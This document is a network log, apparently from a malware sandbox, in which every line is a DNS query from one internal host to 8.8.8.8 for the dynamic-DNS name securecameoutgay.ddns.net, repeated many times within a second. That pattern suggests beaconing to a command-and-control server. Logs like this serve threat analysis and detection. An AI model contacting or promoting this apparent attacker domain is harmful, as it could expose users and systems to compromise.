                                                    Oct 12, 2024 23:05:51.134737968 CEST192.168.2.148.8.8.80xe84aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.141475916 CEST192.168.2.148.8.8.80xe84aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.148180008 CEST192.168.2.148.8.8.80xe84aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.154819012 CEST192.168.2.148.8.8.80xe84aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.161525965 CEST192.168.2.148.8.8.80xe84aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.171714067 CEST192.168.2.148.8.8.80x5d31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.178699017 CEST192.168.2.148.8.8.80x5d31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.185436010 CEST192.168.2.148.8.8.80x5d31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.192262888 CEST192.168.2.148.8.8.80x5d31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.198779106 CEST192.168.2.148.8.8.80x5d31Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.205813885 CEST192.168.2.148.8.8.80xd6a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.212470055 CEST192.168.2.148.8.8.80xd6a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.219197989 CEST192.168.2.148.8.8.80xd6a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.226239920 CEST192.168.2.148.8.8.80xd6a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.233002901 CEST192.168.2.148.8.8.80xd6a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.239748001 CEST192.168.2.148.8.8.80x237cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.246620893 CEST192.168.2.148.8.8.80x237cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.253359079 CEST192.168.2.148.8.8.80x237cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.259593964 CEST192.168.2.148.8.8.80x237cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.266200066 CEST192.168.2.148.8.8.80x237cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.273181915 CEST192.168.2.148.8.8.80xe5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.279921055 CEST192.168.2.148.8.8.80xe5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.286741018 CEST192.168.2.148.8.8.80xe5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.293335915 CEST192.168.2.148.8.8.80xe5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.300156116 CEST192.168.2.148.8.8.80xe5edStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.306586027 CEST192.168.2.148.8.8.80xd959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.312913895 CEST192.168.2.148.8.8.80xd959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.319407940 CEST192.168.2.148.8.8.80xd959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.326267958 CEST192.168.2.148.8.8.80xd959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.332799911 CEST192.168.2.148.8.8.80xd959Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.339442968 CEST192.168.2.148.8.8.80xc12aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.346244097 CEST192.168.2.148.8.8.80xc12aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.352634907 CEST192.168.2.148.8.8.80xc12aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.359946966 CEST192.168.2.148.8.8.80xc12aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.366879940 CEST192.168.2.148.8.8.80xc12aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.373657942 CEST192.168.2.148.8.8.80xad0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.381011009 CEST192.168.2.148.8.8.80xad0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.387789965 CEST192.168.2.148.8.8.80xad0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.394527912 CEST192.168.2.148.8.8.80xad0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.401276112 CEST192.168.2.148.8.8.80xad0cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.407968044 CEST192.168.2.148.8.8.80xa29bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.415008068 CEST192.168.2.148.8.8.80xa29bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.424048901 CEST192.168.2.148.8.8.80xa29bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.430901051 CEST192.168.2.148.8.8.80xa29bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.437334061 CEST192.168.2.148.8.8.80xa29bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.444211960 CEST192.168.2.148.8.8.80xc066Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.450982094 CEST192.168.2.148.8.8.80xc066Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.457503080 CEST192.168.2.148.8.8.80xc066Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.464281082 CEST192.168.2.148.8.8.80xc066Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.471142054 CEST192.168.2.148.8.8.80xc066Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.477972984 CEST192.168.2.148.8.8.80x3bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.485171080 CEST192.168.2.148.8.8.80x3bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.491708994 CEST192.168.2.148.8.8.80x3bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.498347044 CEST192.168.2.148.8.8.80x3bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.504914999 CEST192.168.2.148.8.8.80x3bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.511730909 CEST192.168.2.148.8.8.80x93feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.518302917 CEST192.168.2.148.8.8.80x93feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.525001049 CEST192.168.2.148.8.8.80x93feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.531431913 CEST192.168.2.148.8.8.80x93feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.537990093 CEST192.168.2.148.8.8.80x93feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.544734955 CEST192.168.2.148.8.8.80x1f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.551057100 CEST192.168.2.148.8.8.80x1f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.557754040 CEST192.168.2.148.8.8.80x1f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.564639091 CEST192.168.2.148.8.8.80x1f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.571245909 CEST192.168.2.148.8.8.80x1f51Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.577936888 CEST192.168.2.148.8.8.80xdeaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.584558010 CEST192.168.2.148.8.8.80xdeaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.592681885 CEST192.168.2.148.8.8.80xdeaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.599175930 CEST192.168.2.148.8.8.80xdeaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.606024981 CEST192.168.2.148.8.8.80xdeaaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.612456083 CEST192.168.2.148.8.8.80xae91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.618911982 CEST192.168.2.148.8.8.80xae91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.625345945 CEST192.168.2.148.8.8.80xae91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.631762981 CEST192.168.2.148.8.8.80xae91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.638895988 CEST192.168.2.148.8.8.80xae91Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.645612001 CEST192.168.2.148.8.8.80x53a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.652203083 CEST192.168.2.148.8.8.80x53a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.658627987 CEST192.168.2.148.8.8.80x53a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.664933920 CEST192.168.2.148.8.8.80x53a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.671294928 CEST192.168.2.148.8.8.80x53a1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.678165913 CEST192.168.2.148.8.8.80x703cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.684513092 CEST192.168.2.148.8.8.80x703cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.691251040 CEST192.168.2.148.8.8.80x703cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.698156118 CEST192.168.2.148.8.8.80x703cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.704665899 CEST192.168.2.148.8.8.80x703cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.711481094 CEST192.168.2.148.8.8.80x4684Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.718101978 CEST192.168.2.148.8.8.80x4684Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.724488974 CEST192.168.2.148.8.8.80x4684Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.730974913 CEST192.168.2.148.8.8.80x4684Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.737392902 CEST192.168.2.148.8.8.80x4684Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.743870974 CEST192.168.2.148.8.8.80x42f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.750550985 CEST192.168.2.148.8.8.80x42f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.757076025 CEST192.168.2.148.8.8.80x42f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.763746023 CEST192.168.2.148.8.8.80x42f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.770405054 CEST192.168.2.148.8.8.80x42f2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.777030945 CEST192.168.2.148.8.8.80x1144Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.783785105 CEST192.168.2.148.8.8.80x1144Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.790384054 CEST192.168.2.148.8.8.80x1144Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.796932936 CEST192.168.2.148.8.8.80x1144Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.803512096 CEST192.168.2.148.8.8.80x1144Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.813899994 CEST192.168.2.148.8.8.80xc766Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.820624113 CEST192.168.2.148.8.8.80xc766Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.827848911 CEST192.168.2.148.8.8.80xc766Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.834525108 CEST192.168.2.148.8.8.80xc766Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.841377020 CEST192.168.2.148.8.8.80xc766Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.847862005 CEST192.168.2.148.8.8.80x8ceaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.854089022 CEST192.168.2.148.8.8.80x8ceaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.860589027 CEST192.168.2.148.8.8.80x8ceaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.867347956 CEST192.168.2.148.8.8.80x8ceaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.874069929 CEST192.168.2.148.8.8.80x8ceaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.880595922 CEST192.168.2.148.8.8.80x8312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.887233019 CEST192.168.2.148.8.8.80x8312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.893877029 CEST192.168.2.148.8.8.80x8312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.900295973 CEST192.168.2.148.8.8.80x8312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.906840086 CEST192.168.2.148.8.8.80x8312Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.913161039 CEST192.168.2.148.8.8.80xde39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.919578075 CEST192.168.2.148.8.8.80xde39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.925961018 CEST192.168.2.148.8.8.80xde39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.932907104 CEST192.168.2.148.8.8.80xde39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.939635038 CEST192.168.2.148.8.8.80xde39Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.946299076 CEST192.168.2.148.8.8.80xc479Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.952935934 CEST192.168.2.148.8.8.80xc479Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.959602118 CEST192.168.2.148.8.8.80xc479Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.966160059 CEST192.168.2.148.8.8.80xc479Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.972862959 CEST192.168.2.148.8.8.80xc479Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.979866982 CEST192.168.2.148.8.8.80xa828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.986543894 CEST192.168.2.148.8.8.80xa828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.993036032 CEST192.168.2.148.8.8.80xa828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:51.999701023 CEST192.168.2.148.8.8.80xa828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.006382942 CEST192.168.2.148.8.8.80xa828Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.012864113 CEST192.168.2.148.8.8.80x19d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.019332886 CEST192.168.2.148.8.8.80x19d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.026088953 CEST192.168.2.148.8.8.80x19d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.032845974 CEST192.168.2.148.8.8.80x19d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.039148092 CEST192.168.2.148.8.8.80x19d9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.045598984 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.052602053 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.059381962 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.066292048 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.072755098 CEST192.168.2.148.8.8.80x14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.079401970 CEST192.168.2.148.8.8.80x6b4bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.086015940 CEST192.168.2.148.8.8.80x6b4bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.092686892 CEST192.168.2.148.8.8.80x6b4bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.099215984 CEST192.168.2.148.8.8.80x6b4bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.105969906 CEST192.168.2.148.8.8.80x6b4bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.112690926 CEST192.168.2.148.8.8.80x1955Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.119347095 CEST192.168.2.148.8.8.80x1955Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.126199961 CEST192.168.2.148.8.8.80x1955Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.132730961 CEST192.168.2.148.8.8.80x1955Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.139357090 CEST192.168.2.148.8.8.80x1955Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.146289110 CEST192.168.2.148.8.8.80x372cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.152964115 CEST192.168.2.148.8.8.80x372cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.159795046 CEST192.168.2.148.8.8.80x372cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.166173935 CEST192.168.2.148.8.8.80x372cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.176585913 CEST192.168.2.148.8.8.80x372cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.182895899 CEST192.168.2.148.8.8.80x1976Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.189218998 CEST192.168.2.148.8.8.80x1976Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.196105957 CEST192.168.2.148.8.8.80x1976Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.202730894 CEST192.168.2.148.8.8.80x1976Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.209388018 CEST192.168.2.148.8.8.80x1976Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.216463089 CEST192.168.2.148.8.8.80xe159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.223323107 CEST192.168.2.148.8.8.80xe159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.230133057 CEST192.168.2.148.8.8.80xe159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.237204075 CEST192.168.2.148.8.8.80xe159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.243901014 CEST192.168.2.148.8.8.80xe159Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.250534058 CEST192.168.2.148.8.8.80xa5ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.257044077 CEST192.168.2.148.8.8.80xa5ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.263638973 CEST192.168.2.148.8.8.80xa5ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.269947052 CEST192.168.2.148.8.8.80xa5ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.276633978 CEST192.168.2.148.8.8.80xa5ecStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.283258915 CEST192.168.2.148.8.8.80x8cbbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.290663004 CEST192.168.2.148.8.8.80x8cbbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.297389984 CEST192.168.2.148.8.8.80x8cbbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.303885937 CEST192.168.2.148.8.8.80x8cbbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.310559034 CEST192.168.2.148.8.8.80x8cbbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.317629099 CEST192.168.2.148.8.8.80xfee1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.324450016 CEST192.168.2.148.8.8.80xfee1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.330926895 CEST192.168.2.148.8.8.80xfee1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.337539911 CEST192.168.2.148.8.8.80xfee1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.344166040 CEST192.168.2.148.8.8.80xfee1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.350929022 CEST192.168.2.148.8.8.80x6fe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.357729912 CEST192.168.2.148.8.8.80x6fe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.364612103 CEST192.168.2.148.8.8.80x6fe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.371277094 CEST192.168.2.148.8.8.80x6fe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.378232002 CEST192.168.2.148.8.8.80x6fe6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.385030985 CEST192.168.2.148.8.8.80x2786Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.391901016 CEST192.168.2.148.8.8.80x2786Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:52.398742914 CEST192.168.2.148.8.8.80x2786Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
